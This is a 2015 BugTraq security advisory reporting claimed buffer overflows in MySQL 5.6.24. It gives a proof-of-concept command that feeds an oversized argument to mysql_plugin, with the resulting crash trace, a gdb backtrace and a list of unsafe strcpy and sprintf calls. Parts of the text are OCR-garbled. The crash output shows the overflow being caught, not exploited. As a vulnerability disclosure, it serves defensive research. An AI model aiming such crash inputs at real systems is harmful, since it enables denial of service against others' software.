BugTraq
Advanced Information Security Corporation, Security Advisory (MYSQL v5.6.24 Buffer Overflows) Oct 07 2015 10:07AM
lem nikolas gmail com
===========================================================
Advanced Information Security Corporation
Security Advisory

===========================================================

a888b.
d888888b.
8P"YP"Y88
8|o||o|88
8' - .88
8`._.' Y8.
d/ `8b.
dP . Y8b.
d8:' " `::88b
d8" 'Y88b
:8P ' :888
8a. : _a88P
._/"Yaa_: .| 88P|
\ YP" `| 8P `.
/ \.___.d| .'
`--..__)888P`._.'

~ Keeping Things Simple!

MySQL v5.6.24 BUFFER OVERFLOWS

Date: 07/10/2015

Author: Nicholas Lemonias

============================================================

========================
SUMMARY
=========================

During a manual source code audit of MYSQL Version 5.6.24, various
buffer overflow issues have been realized.

===================
TECHNICAL DETAILS
===================

root@priv8: ~# /usr/bin/mysql_plugin `perl -e 'print ?X? x 9000'`

*** buffer overflow detected ***: mysql_plugin terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)[0xb720d6f3]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__fortify_fail+0x45)[0xb729b2d5]

/lib/1386-linux-gnu/1686/cmov/libc.so.6(+0xf838a)[0xb729938a]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
insecure call
mysql_plugin(main+0x202)[0xb752ee22]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb71baa
63]
mysql_plugin(+0xa90d)[0xb752f90d]
======= Memory map: ========
b6800000-b6821000 nw-p 00000000 00:00
b6821000-b6900000 ---p 00000000 00 00
b699d000-b699e000 ---p 00000000 00:00
b699e000-b71a1000 rw-p 00000000 00 00
b71a1000-b7345000 r-xp 00000000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1
9.50

b7345000-b7347000 r-?p 001a4000 00:13 1673
/lib/i386-linux~gnu/i686/cmov/libc-2.1
9.so

b7347000-b7348000 rw-p 00la6000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1
9.so

b7348000-b734b000 rw-p 00000000 00 00 0

b734b000-b7367000 r-xp 00000000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
b7367000-b7368000 rw-p 0001b000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
b7368000?b73ac000 r-xp 00000000 00:13 15649
/lib/i386-linux-gnu/1686/cmov/libm-2.1
9.so
bffc9000-c0000000 pw-p 00000000 00:00 0 [stack]

Program received signal SIGABRT, Aborted.
Oxb7fdebe0 in __kernel_vsyscall ()
(gdb) bt
#0 0xb7fdebe0 in __kernel_vsyscall ()
#1 0xb7caa307 in __GI_raise (sig=sig@entry=6)
at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2 0xb7cab9c3 in __GI_abort () at abort.c:89
#3 0xb7ce86f8 in __libc_message (do_abort=do_abort@entry=2,
fmt=fmt@entry=0xb7ddbe55 "*** %s ***: %s terminated\n?)
at ../sysdeps/posix/libc_fatal.c:175
#4 0xb7d762d5 in __GI___fortify_fail (
msg=msg@entry=0xb7ddbdd6 "buffer overflow detected?)
at fortify_fail.c:31
#5 0xb7d7438a in __GI___chk_fail () at chk_fail.c:28
#6 0xb7d73877 in __strcpy_chk (dest=0xbffe8c9c 'A' <repeats 200 times>...,
src=0xbffe96ed 'A' <repeats 200 times>..., destlen=<optimized out>)
at strcpy_chk.c:60
#7 0x80009e22 in main ()

(gdb)

(gdb) disas
Dump of assembler code for function __kernel_vsyscall:

0xb7fdebd0 <+0>: push %ecx
0xb7fdebd1 <+1>: push %edx
Oxb7fdebd2 <+2>: push %ebp
Oxb7fdebd3 <+3>: mov %esp,%ebp
0xb7fdebd5 <+5>: sysenter
Oxb7fdebd7 <+7>: nop

Oxb7fdebd8 <+8>: nop

0xb7fdebd9 <+9>: nop

Oxb7fdebda <+10>: nop
Oxb7fdebdb <+11>: nop
Oxb7fdebdc <+12>: nop
Oxb7fdebdd <+13>: nop
Oxb7fdebde <+14>: int x80
=> Oxb7fdebe0 <+16>: pop %ebp
Oxb7fdebe1 <+17>: pop %edx
0xb7fdebe2 <+18>: pop %ecx
Oxb7fdebe3 <+19>: ret
End of assembler dump.

(gdb)

============================
TECHNICAL SYNOPSIS / POC #2
============================

Unsafe Use of strcpy; this can lead to a buffer overflow condition

----->
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]

A user-supplied string from the command-line is copied to a fixed
length destination buffer.

-----------------[ mysql_plugin.c]-------------------------------

Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(plugin_name, argv[i]);

permission set:

-rwxr-xr-x 1 root root 2833756 Jul 15 21:22 /usr/bin/mysql_plugin

===============================================
MySQL V 5.6.24 VULNERABILITIES - SOURCE CODE
===============================================

1. Insecure use of sprintf

Vulnerability Description: A char* type is copied to a fixed length
destination buffer. This could lead to a buffer overflow.

Line: 577 - Filename: ../mysql/mysql-5.6.24/regex/main.c

sprintf(efbuf, "MY_REG_%s", name);

2.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is copied to a fixed length destination buffer. This
could lead to a buffer overflow.

Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(plugin_name, argv[i]);

3.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is copied to a fixed length destination buffer. This
could lead to a buffer overflow.

Line: 797 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(config_file, argv[i]);

4.
Insecure use of sprintf.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 544 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched null at `%.20s'", p);

5.
Insecure use of sprintf.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 525 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched `%.*s'", len, p);

6.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is being copied to a fixed length destination buffer.
This could lead to a buffer overflow.
Line: 413 - Filename:
./mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/dblqh/redoLogReader/r
eader.cpp
strcpy(fileName, argv[1]);

7.
Insecure use of sprintf.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 531 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched `%.*s' instead", len, p);

8.
Insecure use of sprintf.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 710 - Filename: ../mysql/mysql-5.6.24/client/mysqlshow.c
sprintf(query,"select count(*) from `%s`", table);

9.
Insecure use of sprintf
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 121 - Filename: ../mysql/mysql-5.6.24/libmysql/conf_to_src.c
sprintf(buf, "%s.conf", set);

10.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 784 - Filename:
./mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/PosixAsyncFile.
cpp
strcpy(path, src);

11.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This, could lead to an overflow.
Line: 377 - Filename:
./mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/Win32AsyncFile.
cpp
strcpy(path, src);
<<<
Size of PATH is PATH_MAX 256

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus